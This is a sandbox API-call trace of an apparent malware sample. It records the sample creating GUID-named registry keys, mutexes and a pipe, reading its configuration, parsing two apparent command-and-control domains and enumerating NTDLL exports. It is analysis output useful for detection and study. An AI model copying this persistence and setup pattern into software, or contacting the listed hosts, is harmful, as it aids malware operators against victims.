[0208.837] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="wsprintfA") returned 0x7ff9757d2610 [0208.837] wsprintfA (in: param_1=0x7aaca40, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="667F6611-8D0F-88EB-47FA-113C6BCED530") returned 36 [0208.838] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0208.838] lstrcpyA (in: lpString1=0x7aaca70, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0208.838] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0208.838] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0208.838] lstrlenA (lpString="\\Vars") returned 5 [0208.838] lstrcpyA (in: lpString1=0x7aacad0, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0208.838] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Vars" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Vars") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Vars" [0208.838] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0208.838] lstrlenA (lpString="\\Files") returned 6 [0208.838] lstrcpyA (in: lpString1=0x7aacb30, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0208.838] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Files" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Files" [0208.838] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0208.838] lstrlenA (lpString="\\Run") returned 4 [0208.838] lstrcpyA (in: lpString1=0x7aacb90, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0208.838] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Run" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Run") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Run" [0208.838] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned 75 [0208.838] lstrlenA (lpString="\\Config") returned 7 [0208.838] lstrcpyA (in: lpString1=0x7aacbf0, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0208.838] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", lpString2="\\Config" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Config") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530\\Config" [0208.838] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 38 [0208.838] lstrlenA (lpString="Local\\") returned 6 [0208.838] lstrcpyA (in: lpString1=0x7aacc50, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.838] lstrcatA (in: lpString1="Local\\", lpString2="{2F87B751-C28A-394B-44D3-167DB8B7AA01}" | out: lpString1="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 38 [0208.839] lstrlenA (lpString="Local\\") returned 6 [0208.839] lstrcpyA (in: lpString1=0x7aacc90, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.839] lstrcatA (in: lpString1="Local\\", lpString2="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" | out: lpString1="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 38 [0208.839] lstrlenA (lpString="Local\\") returned 6 [0208.839] lstrcpyA (in: lpString1=0x7aaccd0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.839] lstrcatA (in: lpString1="Local\\", lpString2="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" | out: lpString1="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned 38 [0208.839] lstrlenA (lpString="Local\\") returned 6 [0208.839] lstrcpyA (in: lpString1=0x7aacd10, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.839] lstrcatA (in: lpString1="Local\\", lpString2="{62D813F7-59FC-E439-F3B6-9D58D74A210C}" | out: lpString1="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{FB999B87-1EC7-E503-005F-32E93403862D}") returned 38 [0208.839] lstrlenA (lpString="Local\\") returned 6 [0208.839] lstrcpyA (in: lpString1=0x7aacd50, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.839] lstrcatA (in: lpString1="Local\\", lpString2="{FB999B87-1EC7-E503-005F-32E93403862D}" | out: lpString1="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}") returned="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned 38 [0208.839] lstrlenA (lpString="Local\\") returned 6 [0208.839] lstrcpyA (in: lpString1=0x7aacd90, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.839] lstrcatA (in: lpString1="Local\\", lpString2="{A8435A97-E752-1A33-B15C-0BEE75506F02}" | out: lpString1="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}" [0208.839] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{793DD25A-8448-133A-56BD-F8F7EA41AC1B}") returned 38 [0208.840] lstrlenA (lpString="Local\\") returned 6 [0208.840] lstrcpyA (in: lpString1=0x7aacdd0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.840] lstrcatA (in: lpString1="Local\\", lpString2="{793DD25A-8448-133A-56BD-F8F7EA41AC1B}" | out: lpString1="Local\\{793DD25A-8448-133A-56BD-F8F7EA41AC1B}") returned="Local\\{793DD25A-8448-133A-56BD-F8F7EA41AC1B}" [0208.840] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{BEE2402B-052B-A020-7FD2-09D423264D48}") returned 38 [0208.840] lstrlenA (lpString="Local\\") returned 6 [0208.840] lstrcpyA (in: lpString1=0x7aace10, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.840] lstrcatA (in: lpString1="Local\\", lpString2="{BEE2402B-052B-A020-7FD2-09D423264D48}" | out: lpString1="Local\\{BEE2402B-052B-A020-7FD2-09D423264D48}") returned="Local\\{BEE2402B-052B-A020-7FD2-09D423264D48}" [0208.840] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}") returned 38 [0208.840] lstrlenA (lpString="\\\\.\\pipe\\") returned 9 [0208.840] lstrcpyA (in: lpString1=0x7aace50, lpString2="\\\\.\\pipe\\" | out: lpString1="\\\\.\\pipe\\") returned="\\\\.\\pipe\\" [0208.840] lstrcatA (in: lpString1="\\\\.\\pipe\\", lpString2="{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" | out: lpString1="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}") returned="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}" [0208.840] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 38 [0208.840] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0208.840] lstrcpyA (in: lpString1=0x7aace90, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0208.840] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="%APPDATA%\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0208.840] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 38 [0208.840] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0208.840] lstrcpyA (in: lpString1=0x7aacee0, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0208.840] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{25E2F79F-402D-9FBF-7229-7443C66DE827}" | out: lpString1="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" [0208.840] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned 38 [0208.840] lstrlenA (lpString="%APPDATA%\\Microsoft\\") returned 20 [0208.840] lstrcpyA (in: lpString1=0x7aacf30, lpString2="%APPDATA%\\Microsoft\\" | out: lpString1="%APPDATA%\\Microsoft\\") returned="%APPDATA%\\Microsoft\\" [0208.841] lstrcatA (in: lpString1="%APPDATA%\\Microsoft\\", lpString2="{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}" | out: lpString1="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}" [0208.841] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned 38 [0208.841] lstrlenA (lpString="Local\\") returned 6 [0208.841] lstrcpyA (in: lpString1=0x7aacf80, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.841] lstrcatA (in: lpString1="Local\\", lpString2="{53667D0F-9637-FD89-3837-2A81EC5BFE45}" | out: lpString1="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}" [0208.841] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned 38 [0208.841] lstrlenA (lpString="Local\\") returned 6 [0208.841] lstrcpyA (in: lpString1=0x7aacfc0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.841] lstrcatA (in: lpString1="Local\\", lpString2="{E089BDC1-BF33-12AE-4914-63668D8847FA}" | out: lpString1="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}" [0208.841] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned 38 [0208.841] lstrlenA (lpString="Local\\") returned 6 [0208.841] lstrcpyA (in: lpString1=0x7aad000, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.841] lstrcatA (in: lpString1="Local\\", lpString2="{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" | out: lpString1="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}" [0208.841] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned 38 [0208.841] lstrlenA (lpString="Local\\") returned 6 [0208.841] lstrcpyA (in: lpString1=0x7aad040, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0208.841] lstrcatA (in: lpString1="Local\\", lpString2="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" | out: lpString1="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" [0208.841] wsprintfA (in: param_1=0x7aaca40, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4}") returned 38 [0208.841] lstrcatA (in: lpString1="", lpString2="{0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4}" | out: lpString1="{0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4}") returned="{0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4}" [0208.841] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0x74ac4bc) returned 0xd1dcc00 [0208.842] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="{0AA2BFE1-E129-CCB9-BBDE-A5C01FF2A9F4}") returned 0x1324 [0208.842] GetLastError () returned 0x0 [0208.842] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegOpenKeyA") returned 0x7ff976f9b9e0 [0208.842] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x235f610 | out: phkResult=0x235f610*=0x1350) returned 0x0 [0208.843] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegQueryValueExA") returned 0x7ff976f97dd0 [0208.843] RegQueryValueExA (in: hKey=0x1350, lpValueName="Ini", lpReserved=0x0, lpType=0x235f590, lpData=0x0, lpcbData=0x235f608*=0x74fd018 | out: lpType=0x235f590*=0x0, lpData=0x0, lpcbData=0x235f608*=0x0) returned 0x2 [0208.844] GetProcAddress (hModule=0x7ff976f80000, lpProcName="RegCloseKey") returned 0x7ff976f972e0 [0208.844] RegCloseKey (hKey=0x1350) returned 0x0 [0208.844] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrToIntExA") returned 0x7ff977374e70 [0208.844] StrToIntExA (in: pszString="40", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="1200", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="10", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="1000", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="12", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="60", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] StrToIntExA (in: pszString="300", dwFlags=0x0, piRet=0x235f608 | out: piRet=0x235f608) returned 1 [0208.844] lstrlenA (lpString="CBA16FFC891E31A5") returned 16 [0208.845] lstrlenA (lpString="niperola.com bagersim.com") returned 25 [0208.845] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrChrA") returned 0x7ff977374cc0 [0208.845] StrChrA (lpStart="niperola.com bagersim.com", wMatch=0x20) returned=" bagersim.com" [0208.845] StrChrA (lpStart="bagersim.com", wMatch=0x20) returned 0x0 [0208.846] GetProcAddress (hModule=0x7ff977360000, lpProcName="StrTrimA") returned 0x7ff977374e80 [0208.846] StrTrimA (in: psz="niperola.com bagersim.com", pszTrimChars=" \x09" | out: psz="niperola.com bagersim.com") returned 0 [0208.846] StrChrA (lpStart="niperola.com bagersim.com", wMatch=0x20) returned=" bagersim.com" [0208.846] StrTrimA (in: psz="bagersim.com", pszTrimChars=" \x09" | out: psz="bagersim.com") returned 0 [0208.846] StrChrA (lpStart="bagersim.com", wMatch=0x20) returned 0x0 [0208.846] GetModuleHandleA (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0208.847] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0208.847] GetModuleHandleA (lpModuleName="kernelbase") returned 0x7ff9753d0000 [0208.847] GetProcAddress (hModule=0x7ff976f80000, lpProcName="GetUserNameA") returned 0x7ff976faec40 [0208.848] GetUserNameA (in: lpBuffer=0x0, pcbBuffer=0x235f6c8 | out: lpBuffer=0x0, pcbBuffer=0x235f6c8) returned 0 [0208.848] GetUserNameA (in: lpBuffer=0x7aad1e0, pcbBuffer=0x235f6c8 | out: lpBuffer="CIiHmnxMn6Ps", pcbBuffer=0x235f6c8) returned 1 [0208.849] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x7ff977f30000 [0208.849] lstrlenA (lpString="A_SHAFinal") returned 10 [0208.849] lstrlenA (lpString="A_SHAInit") returned 9 [0208.849] lstrlenA (lpString="A_SHAUpdate") returned 11 [0208.849] lstrlenA (lpString="AlpcAdjustCompletionListConcurrencyCount") returned 40 [0208.849] lstrlenA (lpString="AlpcFreeCompletionListMessage") returned 29 [0208.849] lstrlenA (lpString="AlpcGetCompletionListLastMessageInformation") returned 43 [0208.849] lstrlenA (lpString="AlpcGetCompletionListMessageAttributes") returned 38 [0208.849] lstrlenA (lpString="AlpcGetHeaderSize") returned 17 [0208.849] lstrlenA (lpString="AlpcGetMessageAttribute") returned 23 [0208.849] lstrlenA (lpString="AlpcGetMessageFromCompletionList") returned 32 [0208.849] lstrlenA (lpString="AlpcGetOutstandingCompletionListMessageCount") returned 44 [0208.849] lstrlenA (lpString="AlpcInitializeMessageAttribute") returned 30 [0208.849] lstrlenA (lpString="AlpcMaxAllowedMessageLength") returned 27 [0208.849] lstrlenA (lpString="AlpcRegisterCompletionList") returned 26 [0208.849] lstrlenA (lpString="AlpcRegisterCompletionListWorkerThread") returned 38 [0208.849] lstrlenA (lpString="AlpcRundownCompletionList") returned 25 [0208.849] lstrlenA (lpString="AlpcUnregisterCompletionList") returned 28 [0208.849] lstrlenA (lpString="AlpcUnregisterCompletionListWorkerThread") returned 40 [0208.849] lstrlenA (lpString="ApiSetQueryApiSetPresence") returned 25 [0208.849] lstrlenA (lpString="CsrAllocateCaptureBuffer") returned 24 [0208.849] lstrlenA (lpString="CsrAllocateMessagePointer") returned 25 [0208.849] lstrlenA (lpString="CsrCaptureMessageBuffer") returned 23 [0208.849] lstrlenA (lpString="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 43 [0208.849] lstrlenA (lpString="CsrCaptureMessageString") returned 23 [0208.849] lstrlenA (lpString="CsrCaptureTimeout") returned 17 [0208.850] lstrlenA (lpString="CsrClientCallServer") returned 19 [0208.850] lstrlenA (lpString="CsrClientConnectToServer") returned 24 [0208.850] lstrlenA (lpString="CsrFreeCaptureBuffer") returned 20 [0208.850] lstrlenA (lpString="CsrGetProcessId") returned 15 [0208.850] lstrlenA (lpString="CsrIdentifyAlertableThread") returned 26 [0208.850] lstrlenA (lpString="CsrSetPriorityClass") returned 19 [0208.850] lstrlenA (lpString="CsrVerifyRegion") returned 15 [0208.850] lstrlenA (lpString="DbgBreakPoint") returned 13 [0208.850] lstrlenA (lpString="DbgPrint") returned 8 [0208.850] lstrlenA (lpString="DbgPrintEx") returned 10 [0208.850] lstrlenA (lpString="DbgPrintReturnControlC") returned 22 [0208.850] lstrlenA (lpString="DbgPrompt") returned 9 [0208.850] lstrlenA (lpString="DbgQueryDebugFilterState") returned 24 [0208.850] lstrlenA (lpString="DbgSetDebugFilterState") returned 22 [0208.850] lstrlenA (lpString="DbgUiConnectToDbg") returned 17 [0208.850] lstrlenA (lpString="DbgUiContinue") returned 13 [0208.850] lstrlenA (lpString="DbgUiConvertStateChangeStructure") returned 32 [0208.850] lstrlenA (lpString="DbgUiConvertStateChangeStructureEx") returned 34 [0208.850] lstrlenA (lpString="DbgUiDebugActiveProcess") returned 23 [0208.850] lstrlenA (lpString="DbgUiGetThreadDebugObject") returned 25 [0208.850] lstrlenA (lpString="DbgUiIssueRemoteBreakin") returned 23 [0208.850] lstrlenA (lpString="DbgUiRemoteBreakin") returned 18 [0208.850] lstrlenA (lpString="DbgUiSetThreadDebugObject") returned 25 [0208.850] lstrlenA (lpString="DbgUiStopDebugging") returned 18 [0208.850] lstrlenA (lpString="DbgUiWaitStateChange") returned 20 [0208.850] lstrlenA (lpString="DbgUserBreakPoint") returned 17 [0208.850] lstrlenA (lpString="EtwCreateTraceInstanceId") returned 24 [0208.850] lstrlenA (lpString="EtwDeliverDataBlock") returned 19 [0208.850] lstrlenA (lpString="EtwEnumerateProcessRegGuids") returned 27 [0208.850] lstrlenA (lpString="EtwEventActivityIdControl") returned 25 [0208.850] lstrlenA (lpString="EtwEventEnabled") returned 15 [0208.850] lstrlenA (lpString="EtwEventProviderEnabled") returned 23 [0208.850] lstrlenA (lpString="EtwEventRegister") returned 16 [0208.850] lstrlenA (lpString="EtwEventSetInformation") returned 22 [0208.850] lstrlenA (lpString="EtwEventUnregister") returned 18 [0208.850] lstrlenA (lpString="EtwEventWrite") returned 13 [0208.850] lstrlenA (lpString="EtwEventWriteEndScenario") returned 24 [0208.850] lstrlenA (lpString="EtwEventWriteEx") returned 15 [0208.850] lstrlenA (lpString="EtwEventWriteFull") returned 17 [0208.850] lstrlenA (lpString="EtwEventWriteNoRegistration") returned 27 [0208.850] lstrlenA (lpString="EtwEventWriteStartScenario") returned 26 [0208.850] lstrlenA (lpString="EtwEventWriteString") returned 19 [0208.850] lstrlenA (lpString="EtwEventWriteTransfer") returned 21 [0208.850] lstrlenA (lpString="EtwGetTraceEnableFlags") returned 22 [0208.850] lstrlenA (lpString="EtwGetTraceEnableLevel") returned 22 [0208.851] lstrlenA (lpString="EtwGetTraceLoggerHandle") returned 23 [0208.851] lstrlenA (lpString="EtwLogTraceEvent") returned 16 [0208.851] lstrlenA (lpString="EtwNotificationRegister") returned 23 [0208.851] lstrlenA (lpString="EtwNotificationUnregister") returned 25 [0208.851] lstrlenA (lpString="EtwProcessPrivateLoggerRequest") returned 30 [0208.851] lstrlenA (lpString="EtwRegisterSecurityProvider") returned 27 [0208.851] lstrlenA (lpString="EtwRegisterTraceGuidsA") returned 22 [0208.851] lstrlenA (lpString="EtwRegisterTraceGuidsW") returned 22 [0208.851] lstrlenA (lpString="EtwReplyNotification") returned 20 [0208.851] lstrlenA (lpString="EtwSendNotification") returned 19 [0208.851] lstrlenA (lpString="EtwSetMark") returned 10 [0208.851] lstrlenA (lpString="EtwTraceEventInstance") returned 21 [0208.851] lstrlenA (lpString="EtwTraceMessage") returned 15 [0208.851] lstrlenA (lpString="EtwTraceMessageVa") returned 17 [0208.851] lstrlenA (lpString="EtwUnregisterTraceGuids") returned 23 [0208.851] lstrlenA (lpString="EtwWriteUMSecurityEvent") returned 23 [0208.851] lstrlenA (lpString="EtwpCreateEtwThread") returned 19 [0208.851] lstrlenA (lpString="EtwpGetCpuSpeed") returned 15 [0208.851] lstrlenA (lpString="EvtIntReportAuthzEventAndSourceAsync") returned 36 [0208.851] lstrlenA (lpString="EvtIntReportEventAndSourceAsync") returned 31 [0208.851] lstrlenA (lpString="ExpInterlockedPopEntrySListEnd") returned 30 [0208.851] lstrlenA (lpString="ExpInterlockedPopEntrySListFault") returned 32 [0208.851] lstrlenA (lpString="ExpInterlockedPopEntrySListResume") returned 33 [0208.851] lstrlenA (lpString="KiRaiseUserExceptionDispatcher") returned 30 [0208.851] lstrlenA (lpString="KiUserApcDispatcher") returned 19 [0208.851] lstrlenA (lpString="KiUserCallbackDispatcher") returned 24 [0208.851] lstrlenA (lpString="KiUserExceptionDispatcher") returned 25 [0208.851] lstrlenA (lpString="KiUserInvertedFunctionTable") returned 27 [0208.851] lstrlenA (lpString="LdrAccessResource") returned 17 [0208.851] lstrlenA (lpString="LdrAddDllDirectory") returned 18 [0208.851] lstrlenA (lpString="LdrAddLoadAsDataTable") returned 21 [0208.851] lstrlenA (lpString="LdrAddRefDll") returned 12 [0208.851] lstrlenA (lpString="LdrAppxHandleIntegrityFailure") returned 29 [0208.851] lstrlenA (lpString="LdrDisableThreadCalloutsForDll") returned 30 [0208.851] lstrlenA (lpString="LdrEnumResources") returned 16 [0208.851] lstrlenA (lpString="LdrEnumerateLoadedModules") returned 25 [0208.851] lstrlenA (lpString="LdrFastFailInLoaderCallout") returned 26 [0208.851] lstrlenA (lpString="LdrFindEntryForAddress") returned 22 [0208.851] lstrlenA (lpString="LdrFindResourceDirectory_U") returned 26 [0208.851] lstrlenA (lpString="LdrFindResourceEx_U") returned 19 [0208.851] lstrlenA (lpString="LdrFindResource_U") returned 17 [0208.851] lstrlenA (lpString="LdrFlushAlternateResourceModules") returned 32 [0208.851] lstrlenA (lpString="LdrGetDllDirectory") returned 18 [0208.851] lstrlenA (lpString="LdrGetDllFullName") returned 17 [0208.851] lstrlenA (lpString="LdrGetDllHandle") returned 15 [0208.851] lstrlenA (lpString="LdrGetDllHandleByMapping") returned 24 [0208.851] lstrlenA (lpString="LdrGetDllHandleByName") returned 21 [0208.851] lstrlenA (lpString="LdrGetDllHandleEx") returned 17 [0208.852] lstrlenA (lpString="LdrGetDllPath") returned 13 [0208.852] lstrlenA (lpString="LdrGetFailureData") returned 17 [0208.852] lstrlenA (lpString="LdrGetFileNameFromLoadAsDataTable") returned 33 [0208.852] lstrlenA (lpString="LdrGetKnownDllSectionHandle") returned 27 [0208.852] lstrlenA (lpString="LdrGetProcedureAddress") returned 22 [0208.852] lstrlenA (lpString="LdrGetProcedureAddressEx") returned 24 [0208.852] lstrlenA (lpString="LdrGetProcedureAddressForCaller") returned 31 [0208.852] lstrlenA (lpString="LdrInitShimEngineDynamic") returned 24 [0208.852] lstrlenA (lpString="LdrInitializeThunk") returned 18 [0208.852] lstrlenA (lpString="LdrLoadAlternateResourceModule") returned 30 [0208.852] lstrlenA (lpString="LdrLoadAlternateResourceModuleEx") returned 32 [0208.852] lstrlenA (lpString="LdrLoadDll") returned 10 